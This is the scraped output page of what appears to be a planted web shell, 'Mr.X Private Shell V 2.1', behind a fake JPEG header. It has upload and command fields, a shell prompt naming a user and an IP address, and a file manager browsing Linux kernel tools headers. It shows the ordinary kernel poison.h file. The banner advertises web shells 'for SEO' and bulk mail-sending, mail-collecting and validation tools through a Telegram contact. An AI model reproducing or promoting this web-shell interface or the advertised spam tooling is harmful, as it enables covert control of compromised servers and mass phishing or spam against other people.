����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _LINUX_POISON_H
#define _LINUX_POISON_H

/********** include/linux/list.h **********/

/*
 * Architectures might want to move the poison pointer offset
 * into some well-recognized area such as 0xdead000000000000,
 * that is also not mappable by user-space exploits:
 */
#ifdef CONFIG_ILLEGAL_POINTER_VALUE
# define POISON_POINTER_DELTA _AC(CONFIG_ILLEGAL_POINTER_VALUE, UL)
#else
# define POISON_POINTER_DELTA 0
#endif

#ifdef __cplusplus
#define LIST_POISON1  NULL
#define LIST_POISON2  NULL
#else
/*
 * These are non-NULL pointers that will result in page faults
 * under normal circumstances, used to verify that nobody uses
 * non-initialized list entries.
 */
#define LIST_POISON1  ((void *) 0x100 + POISON_POINTER_DELTA)
#define LIST_POISON2  ((void *) 0x200 + POISON_POINTER_DELTA)
#endif

/********** include/linux/timer.h **********/
/*
 * Magic number "tsta" to indicate a static timer initializer
 * for the object debugging code.
 */
#define TIMER_ENTRY_STATIC	((void *) 0x300 + POISON_POINTER_DELTA)

/********** mm/page_poison.c **********/
#define PAGE_POISON 0xaa

/********** mm/page_alloc.c ************/

#define TAIL_MAPPING	((void *) 0x400 + POISON_POINTER_DELTA)

/********** mm/slab.c **********/
/*
 * Magic nums for obj red zoning.
 * Placed in the first word before and the first word after an obj.
 */
#define	RED_INACTIVE	0x09F911029D74E35BULL	/* when obj is inactive */
#define	RED_ACTIVE	0xD84156C5635688C0ULL	/* when obj is active */

#define SLUB_RED_INACTIVE	0xbb
#define SLUB_RED_ACTIVE		0xcc

/* ...and for poisoning */
#define	POISON_INUSE	0x5a	/* for use-uninitialised poisoning */
#define POISON_FREE	0x6b	/* for use-after-free poisoning */
#define	POISON_END	0xa5	/* end-byte of poisoning */

/********** arch/$ARCH/mm/init.c **********/
#define POISON_FREE_INITMEM	0xcc

/********** arch/ia64/hp/common/sba_iommu.c **********/
/*
 * arch/ia64/hp/common/sba_iommu.c uses a 16-byte poison string with a
 * value of "SBAIOMMU POISON\0" for spill-over poisoning.
 */

/********** fs/jbd/journal.c **********/
#define JBD_POISON_FREE		0x5b
#define JBD2_POISON_FREE	0x5c

/********** drivers/base/dmapool.c **********/
#define	POOL_POISON_FREED	0xa7	/* !inuse */
#define	POOL_POISON_ALLOCATED	0xa9	/* !initted */

/********** drivers/atm/ **********/
#define ATM_POISON_FREE		0x12
#define ATM_POISON		0xdeadbeef

/********** kernel/mutexes **********/
#define MUTEX_DEBUG_INIT	0x11
#define MUTEX_DEBUG_FREE	0x22

/********** security/ **********/
#define KEY_DESTROY		0xbd

#endif

Filemanager

Name Type Size Permission Actions
sched Folder 0755
unaligned Folder 0755
align.h File 339 B 0644
arm-smccc.h File 5.63 KB 0644
atomic.h File 363 B 0644
bitfield.h File 5.33 KB 0644
bitmap.h File 4.82 KB 0644
bitops.h File 2.15 KB 0644
bits.h File 1.17 KB 0644
btf_ids.h File 5.97 KB 0644
bug.h File 442 B 0644
build_bug.h File 3.04 KB 0644
compiler-gcc.h File 1.24 KB 0644
compiler.h File 5.82 KB 0644
compiler_types.h File 1.09 KB 0644
const.h File 421 B 0644
coresight-pmu.h File 2.32 KB 0644
ctype.h File 1.9 KB 0644
debug_locks.h File 288 B 0644
delay.h File 117 B 0644
err.h File 1.99 KB 0644
export.h File 129 B 0644
filter.h File 9.59 KB 0644
find.h File 5.77 KB 0644
ftrace.h File 120 B 0644
gfp.h File 322 B 0644
gfp_types.h File 46 B 0644
hardirq.h File 280 B 0644
hash.h File 2.93 KB 0644
hashtable.h File 4.44 KB 0644
interrupt.h File 129 B 0644
interval_tree_generic.h File 6.7 KB 0644
irqflags.h File 1.37 KB 0644
jhash.h File 4.46 KB 0644
kallsyms.h File 646 B 0644
kconfig.h File 2.39 KB 0644
kern_levels.h File 954 B 0644
kernel.h File 2.64 KB 0644
linkage.h File 123 B 0644
list.h File 22.48 KB 0644
list_sort.h File 374 B 0644
lockdep.h File 1.43 KB 0644
log2.h File 4.46 KB 0644
math.h File 764 B 0644
math64.h File 1.22 KB 0644
module.h File 270 B 0644
mutex.h File 117 B 0644
nmi.h File 0 B 0644
numa.h File 292 B 0644
objtool_types.h File 1.8 KB 0644
overflow.h File 4.11 KB 0644
poison.h File 2.5 KB 0644
proc_fs.h File 123 B 0644
rbtree.h File 9.32 KB 0644
rbtree_augmented.h File 9.34 KB 0644
rcu.h File 437 B 0644
refcount.h File 4.11 KB 0644
ring_buffer.h File 2.4 KB 0644
rwsem.h File 920 B 0644
seq_file.h File 126 B 0644
sizes.h File 1.12 KB 0644
slab.h File 1.17 KB 0644
spinlock.h File 1.24 KB 0644
stacktrace.h File 678 B 0644
static_call_types.h File 2.74 KB 0644
string.h File 1.4 KB 0644
stringify.h File 380 B 0644
time64.h File 347 B 0644
types.h File 1.72 KB 0644
zalloc.h File 252 B 0644